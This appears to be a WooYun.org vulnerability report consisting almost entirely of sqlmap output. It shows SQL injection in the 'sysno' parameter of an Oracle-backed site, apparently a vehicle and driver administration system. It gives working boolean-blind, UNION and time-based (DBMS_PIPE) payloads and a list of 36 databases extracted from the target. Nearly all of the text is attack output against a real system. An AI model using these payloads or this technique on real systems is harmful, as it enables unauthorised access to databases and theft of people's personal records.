WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: sysno
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sysno=31796 AND 9299=9299
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 to 20 columns
    Payload: sysno=-5054 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(116)||CHR(107)||CHR(110)||CHR(58)||NVL(CAST(CHR(116)||CHR(98)||CHR(108)||CHR(114)||CHR(82)||CHR(70)||CHR(111)||CHR(67)||CHR(116)||CHR(118) AS VARCHAR(4000)),CHR(32))||CHR(58)||CHR(110)||CHR(97)||CHR(113)||CHR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: sysno=31796 AND 2455=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(103)||CHR(86)||CHR(115),5)
---
available databases [36]:
[*] APPEXA
[*] BODYPROVE
[*] CTXSYS
[*] DRV_HEALTH
[*] FINGER
[*] HR
[*] JZJJWEB
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] PREASIGN
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TRFFMESSAGE
[*] VEH_ZBZX
[*] VEHDRVINTERFACE
[*] VEHDRVVIO
[*] VEHFS_ADMIN
[*] VEHI
[*] VIO_ADMIN
[*] WKSYS
[*] WMSYS
[*] XDB